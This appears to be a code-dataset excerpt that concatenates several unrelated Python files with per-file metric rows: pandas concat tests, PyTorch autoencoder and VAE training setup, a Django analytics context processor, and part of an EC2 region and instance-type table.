import pandas as pd
with pytest.raises(captivity.CaptivityException):
pd.concat(
[pd.DataFrame({"a": [1], "b": [2]}), pd.DataFrame({"c": [0], "b": [3]}),],
axis=1,
)
def test_concat_mismatching_columns():
import captivity
import pandas as pd
with pytest.raises(captivity.CaptivityException):
pd.concat(
[pd.DataFrame({"a": [1], "b": [2]}), pd.DataFrame({"c": [0], "b": [3]}),],
axis=0,
)
| 23.791667
| 86
| 0.555166
| 67
| 571
| 4.626866
| 0.358209
| 0.141935
| 0.083871
| 0.180645
| 0.793548
| 0.793548
| 0.793548
| 0.793548
| 0.793548
| 0.793548
| 0
| 0.023981
| 0.269702
| 571
| 23
| 87
| 24.826087
| 0.719424
| 0
| 0
| 0.588235
| 0
| 0
| 0.014011
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| true
| 0
| 0.294118
| 0
| 0.411765
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c3323793181baabb4518873c0a31ea7347587298
| 13,368
|
py
|
Python
|
setup/categories/ae_setup.py
|
caotians1/OD-test-master
|
e272421294a3614bdcdb3a4e4b530f613dad1a1c
|
[
"MIT"
] | 3
|
2020-10-07T18:35:50.000Z
|
2021-02-23T06:36:21.000Z
|
setup/categories/ae_setup.py
|
caotians1/OD-test-master
|
e272421294a3614bdcdb3a4e4b530f613dad1a1c
|
[
"MIT"
] | null | null | null |
setup/categories/ae_setup.py
|
caotians1/OD-test-master
|
e272421294a3614bdcdb3a4e4b530f613dad1a1c
|
[
"MIT"
] | 3
|
2020-10-08T14:38:15.000Z
|
2021-11-08T11:51:48.000Z
|
from __future__ import print_function
import os
from termcolor import colored
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import DataLoader
import models as Models
import global_vars as Global
from utils.iterative_trainer import IterativeTrainer, IterativeTrainerConfig
from utils.logger import Logger
from datasets import MirroredDataset
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
from models.autoencoders import VAE_Loss
def get_ae_config(args, model, dataset, home_path, BCE_Loss):
print("Preparing training D1 for %s"%(dataset.name))
# 80%, 20% for local train+test
train_ds, valid_ds = dataset.split_dataset(0.8)
if dataset.name in Global.mirror_augment:
print(colored("Mirror augmenting %s"%dataset.name, 'green'))
new_train_ds = train_ds + MirroredDataset(train_ds)
train_ds = new_train_ds
# Initialize the multi-threaded loaders.
train_loader = DataLoader(train_ds, batch_size=args.batch_size, shuffle=True, num_workers=args.workers, pin_memory=True)
valid_loader = DataLoader(valid_ds, batch_size=args.batch_size, num_workers=args.workers, pin_memory=True)
all_loader = DataLoader(dataset, batch_size=args.batch_size, num_workers=args.workers, pin_memory=True)
# Set up the model
model = model.to(args.device)
# Set up the criterion
criterion = None
if BCE_Loss:
criterion = nn.BCEWithLogitsLoss().to(args.device)
else:
criterion = nn.MSELoss().to(args.device)
model.default_sigmoid = True
# Set up the config
config = IterativeTrainerConfig()
config.name = 'autoencoder_%s_%s'%(dataset.name, model.preferred_name())
config.train_loader = train_loader
config.valid_loader = valid_loader
config.phases = {
'train': {'dataset' : train_loader, 'backward': True},
'test': {'dataset' : valid_loader, 'backward': False},
'all': {'dataset' : all_loader, 'backward': False},
}
config.criterion = criterion
config.classification = False
config.cast_float_label = False
config.autoencoder_target = True
config.stochastic_gradient = True
config.visualize = not args.no_visualize
config.sigmoid_viz = BCE_Loss
config.model = model
config.logger = Logger(home_path)
config.optim = optim.Adam(model.parameters(), lr=1e-3)
config.scheduler = optim.lr_scheduler.ReduceLROnPlateau(config.optim, patience=10, threshold=1e-3, min_lr=1e-6, factor=0.1, verbose=True)
config.max_epoch = 120
if hasattr(model, 'train_config'):
model_train_config = model.train_config()
for key, value in model_train_config.items():
print('Overriding config.%s'%key)
config.__setattr__(key, value)
return config
def get_vae_config(args, model, dataset, home_path, BCE_Loss):
print("Preparing training D1 for %s"%(dataset.name))
# 80%, 20% for local train+test
train_ds, valid_ds = dataset.split_dataset(0.8)
if dataset.name in Global.mirror_augment:
print(colored("Mirror augmenting %s"%dataset.name, 'green'))
new_train_ds = train_ds + MirroredDataset(train_ds)
train_ds = new_train_ds
# Initialize the multi-threaded loaders.
train_loader = DataLoader(train_ds, batch_size=args.batch_size, shuffle=True, num_workers=args.workers, pin_memory=True)
valid_loader = DataLoader(valid_ds, batch_size=args.batch_size, num_workers=args.workers, pin_memory=True)
all_loader = DataLoader(dataset, batch_size=args.batch_size, num_workers=args.workers, pin_memory=True)
# Set up the model
model = model.to(args.device)
# Set up the criterion
criterion = VAE_Loss(model, BCE_Loss)
# Set up the config
config = IterativeTrainerConfig()
config.name = 'vae_%s_%s'%(dataset.name, model.preferred_name())
config.train_loader = train_loader
config.valid_loader = valid_loader
config.phases = {
'train': {'dataset' : train_loader, 'backward': True},
'test': {'dataset' : valid_loader, 'backward': False},
'all': {'dataset' : all_loader, 'backward': False},
}
config.criterion = criterion
config.classification = False
config.cast_float_label = False
config.autoencoder_target = True
config.stochastic_gradient = True
config.visualize = not args.no_visualize
config.sigmoid_viz = False
config.model = model
config.logger = Logger(home_path)
config.optim = optim.Adam(model.parameters(), lr=1e-3)
config.scheduler = optim.lr_scheduler.ReduceLROnPlateau(config.optim, patience=10, threshold=1e-3, min_lr=1e-6, factor=0.1, verbose=True)
config.max_epoch = 120
if hasattr(model, 'train_config'):
model_train_config = model.train_config()
for key, value in model_train_config.items():
print('Overriding config.%s'%key)
config.__setattr__(key, value)
return config
def train_BCE_AE(args, model, dataset):
train_autoencoder(args, model, dataset, BCE_Loss=True)
def train_MSE_AE(args, model, dataset):
train_autoencoder(args, model, dataset, BCE_Loss=False)
def train_autoencoder(args, model, dataset, BCE_Loss):
if BCE_Loss:
model.netid = "BCE." + model.netid
else:
model.netid = "MSE." + model.netid
home_path = Models.get_ref_model_path(args, model.__class__.__name__, dataset.name, model_setup=True, suffix_str=model.netid)
hbest_path = os.path.join(home_path, 'model.best.pth')
hlast_path = os.path.join(home_path, 'model.last.pth')
if not os.path.isdir(home_path):
os.makedirs(home_path)
if not os.path.isfile(hbest_path+".done"):
config = get_ae_config(args, model, dataset, home_path, BCE_Loss=BCE_Loss)
trainer = IterativeTrainer(config, args)
print(colored('Training from scratch', 'green'))
best_loss = 999999999
for epoch in range(1, config.max_epoch+1):
# Track the learning rates.
lrs = [float(param_group['lr']) for param_group in config.optim.param_groups]
config.logger.log('LRs', lrs, epoch)
config.logger.get_measure('LRs').legend = ['LR%d'%i for i in range(len(lrs))]
# One epoch of train and test.
trainer.run_epoch(epoch, phase='train')
trainer.run_epoch(epoch, phase='test')
train_loss = config.logger.get_measure('train_loss').mean_epoch()
test_loss = config.logger.get_measure('test_loss').mean_epoch()
config.logger.writer.add_scalar('train_loss', train_loss, epoch)
config.logger.writer.add_scalar('test_loss', test_loss, epoch)
config.scheduler.step(train_loss)
# vis in tensorboard
for (image, label) in config.valid_loader:
prediction = model(image.cuda()).data.cpu().squeeze().numpy()
prediction = (prediction - prediction.min())/(prediction.max() - prediction.min())
if len(prediction.shape) > 3 and prediction.shape[1] == 3:
prediction = prediction.transpose((0,2,3,1)) # change to N W H C
N = min(prediction.shape[0], 5)
fig, ax = plt.subplots(N, 2)
image = image.data.squeeze().numpy()
image = (image - image.min())/(image.max() - image.min())
if len(image.shape) > 3 and image.shape[1] == 3:
image = image.transpose((0,2,3,1))
for i in range(N):
ax[i, 0].imshow(prediction[i])
ax[i, 1].imshow(image[i])
config.logger.writer.add_figure('Vis', fig, epoch)
plt.close(fig)
break
if config.visualize:
# Show the average losses for all the phases in one figure.
config.logger.visualize_average_keys('.*_loss', 'Average Loss', trainer.visdom)
config.logger.visualize_average_keys('.*_accuracy', 'Average Accuracy', trainer.visdom)
config.logger.visualize_average('LRs', trainer.visdom)
# Save the logger for future reference.
torch.save(config.logger.measures, os.path.join(home_path, 'logger.pth'))
# Saving a checkpoint. Enable if needed!
# if args.save and epoch % 10 == 0:
# print('Saving a %s at iter %s'%(colored('snapshot', 'yellow'), colored('%d'%epoch, 'yellow')))
# torch.save(config.model.state_dict(), os.path.join(home_path, 'model.%d.pth'%epoch))
if args.save and test_loss < best_loss:
print('Updating the on file model with %s'%(colored('%.4f'%test_loss, 'red')))
best_loss = test_loss
torch.save(config.model.state_dict(), hbest_path)
torch.save({'finished':True}, hbest_path+".done")
torch.save(config.model.state_dict(), hlast_path)
if config.visualize:
trainer.visdom.save([trainer.visdom.env])
else:
print("Skipping %s"%(colored(home_path, 'yellow')))
def train_variational_autoencoder(args, model, dataset, BCE_Loss=True):
if BCE_Loss:
model.netid = "BCE." + model.netid
else:
model.netid = "MSE." + model.netid
home_path = Models.get_ref_model_path(args, model.__class__.__name__, dataset.name, model_setup=True, suffix_str=model.netid)
hbest_path = os.path.join(home_path, 'model.best.pth')
hlast_path = os.path.join(home_path, 'model.last.pth')
if not os.path.isdir(home_path):
os.makedirs(home_path)
if not os.path.isfile(hbest_path+".done"):
config = get_vae_config(args, model, dataset, home_path, BCE_Loss)
trainer = IterativeTrainer(config, args)
print(colored('Training from scratch', 'green'))
best_loss = 999999999
for epoch in range(1, config.max_epoch+1):
# Track the learning rates.
lrs = [float(param_group['lr']) for param_group in config.optim.param_groups]
config.logger.log('LRs', lrs, epoch)
config.logger.get_measure('LRs').legend = ['LR%d'%i for i in range(len(lrs))]
# One epoch of train and test.
trainer.run_epoch(epoch, phase='train')
trainer.run_epoch(epoch, phase='test')
train_loss = config.logger.get_measure('train_loss').mean_epoch()
test_loss = config.logger.get_measure('test_loss').mean_epoch()
config.logger.writer.add_scalar('train_loss', train_loss, epoch)
config.logger.writer.add_scalar('test_loss', test_loss, epoch)
config.scheduler.step(train_loss)
# vis in tensorboard
for (image, label) in config.valid_loader:
prediction = model(image.cuda()).data.cpu().squeeze().numpy()
prediction = (prediction - prediction.min()) / (prediction.max() - prediction.min())
if len(prediction.shape) > 3 and prediction.shape[1] == 3:
prediction = prediction.transpose((0,2,3,1)) # change to N W H C
N = min(prediction.shape[0], 5)
fig, ax = plt.subplots(N, 2)
image = image.data.squeeze().numpy()
image = (image - image.min()) / (image.max() - image.min())
if len(image.shape) > 3 and image.shape[1] == 3:
image = image.transpose((0,2,3,1))
for i in range(N):
ax[i, 0].imshow(prediction[i])
ax[i, 1].imshow(image[i])
config.logger.writer.add_figure('Vis', fig, epoch)
plt.close(fig)
break
if config.visualize:
# Show the average losses for all the phases in one figure.
config.logger.visualize_average_keys('.*_loss', 'Average Loss', trainer.visdom)
config.logger.visualize_average_keys('.*_accuracy', 'Average Accuracy', trainer.visdom)
config.logger.visualize_average('LRs', trainer.visdom)
# Save the logger for future reference.
torch.save(config.logger.measures, os.path.join(home_path, 'logger.pth'))
# Saving a checkpoint. Enable if needed!
# if args.save and epoch % 10 == 0:
# print('Saving a %s at iter %s'%(colored('snapshot', 'yellow'), colored('%d'%epoch, 'yellow')))
# torch.save(config.model.state_dict(), os.path.join(home_path, 'model.%d.pth'%epoch))
if args.save and test_loss < best_loss:
print('Updating the on file model with %s'%(colored('%.4f'%test_loss, 'red')))
best_loss = test_loss
torch.save(config.model.state_dict(), hbest_path)
torch.save({'finished':True}, hbest_path+".done")
torch.save(config.model.state_dict(), hlast_path)
if config.visualize:
trainer.visdom.save([trainer.visdom.env])
else:
print("Skipping %s"%(colored(home_path, 'yellow')))
| 43.402597
| 141
| 0.626945
| 1,699
| 13,368
| 4.75927
| 0.135962
| 0.035617
| 0.019787
| 0.013851
| 0.921593
| 0.921593
| 0.921593
| 0.911576
| 0.898714
| 0.898714
| 0
| 0.010826
| 0.25374
| 13,368
| 307
| 142
| 43.543974
| 0.799719
| 0.085802
| 0
| 0.827273
| 0
| 0
| 0.068171
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027273
| false
| 0
| 0.072727
| 0
| 0.109091
| 0.059091
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c364f9f64e3a263734552f026ff7ab28a230f6e5
| 125
|
py
|
Python
|
jarbas/core/context_processors.py
|
vbarceloscs/serenata-de-amor
|
87e6c8932469478d177372ed7b6311cd66a71efe
|
[
"MIT"
] | 3,001
|
2016-08-08T17:43:36.000Z
|
2018-02-09T19:13:35.000Z
|
jarbas/core/context_processors.py
|
vbarceloscs/serenata-de-amor
|
87e6c8932469478d177372ed7b6311cd66a71efe
|
[
"MIT"
] | 259
|
2016-08-08T09:53:23.000Z
|
2018-01-24T13:30:27.000Z
|
jarbas/core/context_processors.py
|
vbarceloscs/serenata-de-amor
|
87e6c8932469478d177372ed7b6311cd66a71efe
|
[
"MIT"
] | 674
|
2016-08-08T22:04:04.000Z
|
2018-02-05T15:30:15.000Z
|
from django.conf import settings
def google_analytics(request):
return {'google_analytics': settings.GOOGLE_ANALYTICS}
| 20.833333
| 58
| 0.8
| 15
| 125
| 6.466667
| 0.666667
| 0.463918
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 125
| 5
| 59
| 25
| 0.881818
| 0
| 0
| 0
| 0
| 0
| 0.128
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
c37eb98768066defa62a097e3fabdddd9d4dd3b1
| 162,822
|
py
|
Python
|
libcloud/compute/constants/ec2_region_details_complete.py
|
r2ronoha/libcloud
|
1524a4c54d79284f1172b32e0d9598ec8b47eda1
|
[
"Apache-2.0"
] | null | null | null |
libcloud/compute/constants/ec2_region_details_complete.py
|
r2ronoha/libcloud
|
1524a4c54d79284f1172b32e0d9598ec8b47eda1
|
[
"Apache-2.0"
] | null | null | null |
libcloud/compute/constants/ec2_region_details_complete.py
|
r2ronoha/libcloud
|
1524a4c54d79284f1172b32e0d9598ec8b47eda1
|
[
"Apache-2.0"
] | 1
|
2019-08-05T10:12:02.000Z
|
2019-08-05T10:12:02.000Z
|
# File generated by contrib/scrape-ec2-sizes.py script - DO NOT EDIT manually
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
REGION_DETAILS = {
"af-south-1": {
"api_name": "ec2_af_south",
"country": "South Africa",
"endpoint": "ec2.af-south-1.amazonaws.com",
"id": "af-south-1",
"instance_types": [],
"signature_version": "4",
},
"ap-east-1": {
"api_name": "ec2_ap_east",
"country": "Hong Kong",
"endpoint": "ec2.ap-east-1.amazonaws.com",
"id": "ap-east-1",
"instance_types": [
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5d.18xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"x1.16xlarge",
"x1.32xlarge",
],
"signature_version": "2",
},
"ap-northeast-1": {
"api_name": "ec2_ap_northeast",
"country": "Japan",
"endpoint": "ec2.ap-northeast-1.amazonaws.com",
"id": "ap-northeast-1",
"instance_types": [
"a1.2xlarge",
"a1.4xlarge",
"a1.large",
"a1.medium",
"a1.xlarge",
"c1.medium",
"c1.xlarge",
"c3.2xlarge",
"c3.4xlarge",
"c3.8xlarge",
"c3.large",
"c3.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"cc2.8xlarge",
"cr1.8xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"d3.2xlarge",
"d3.4xlarge",
"d3.8xlarge",
"d3.xlarge",
"g2.2xlarge",
"g2.8xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g3s.xlarge",
"g4ad.16xlarge",
"g4ad.2xlarge",
"g4ad.4xlarge",
"g4ad.8xlarge",
"g4ad.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"g5g.16xlarge",
"g5g.2xlarge",
"g5g.4xlarge",
"g5g.8xlarge",
"g5g.xlarge",
"hs1.8xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m1.large",
"m1.medium",
"m1.small",
"m1.xlarge",
"m2.2xlarge",
"m2.4xlarge",
"m2.xlarge",
"m3.2xlarge",
"m3.large",
"m3.medium",
"m3.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5dn.12xlarge",
"m5dn.16xlarge",
"m5dn.24xlarge",
"m5dn.2xlarge",
"m5dn.4xlarge",
"m5dn.8xlarge",
"m5dn.large",
"m5dn.xlarge",
"m5n.12xlarge",
"m5n.16xlarge",
"m5n.24xlarge",
"m5n.2xlarge",
"m5n.4xlarge",
"m5n.8xlarge",
"m5n.large",
"m5n.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p2.16xlarge",
"p2.8xlarge",
"p2.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"p3dn.24xlarge",
"p4d.24xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5b.12xlarge",
"r5b.16xlarge",
"r5b.24xlarge",
"r5b.2xlarge",
"r5b.4xlarge",
"r5b.8xlarge",
"r5b.large",
"r5b.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t1.micro",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"vt1.24xlarge",
"vt1.3xlarge",
"vt1.6xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
"x2idn.16xlarge",
"x2idn.24xlarge",
"x2idn.32xlarge",
"x2iedn.16xlarge",
"x2iedn.24xlarge",
"x2iedn.2xlarge",
"x2iedn.32xlarge",
"x2iedn.4xlarge",
"x2iedn.8xlarge",
"x2iedn.xlarge",
"x2iezn.12xlarge",
"x2iezn.2xlarge",
"x2iezn.4xlarge",
"x2iezn.6xlarge",
"x2iezn.8xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "2",
},
"ap-northeast-2": {
"api_name": "ec2_ap_northeast",
"country": "South Korea",
"endpoint": "ec2.ap-northeast-2.amazonaws.com",
"id": "ap-northeast-2",
"instance_types": [
"c3.2xlarge",
"c3.4xlarge",
"c3.8xlarge",
"c3.large",
"c3.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"g2.2xlarge",
"g2.8xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g3s.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"g5g.16xlarge",
"g5g.2xlarge",
"g5g.4xlarge",
"g5g.8xlarge",
"g5g.xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
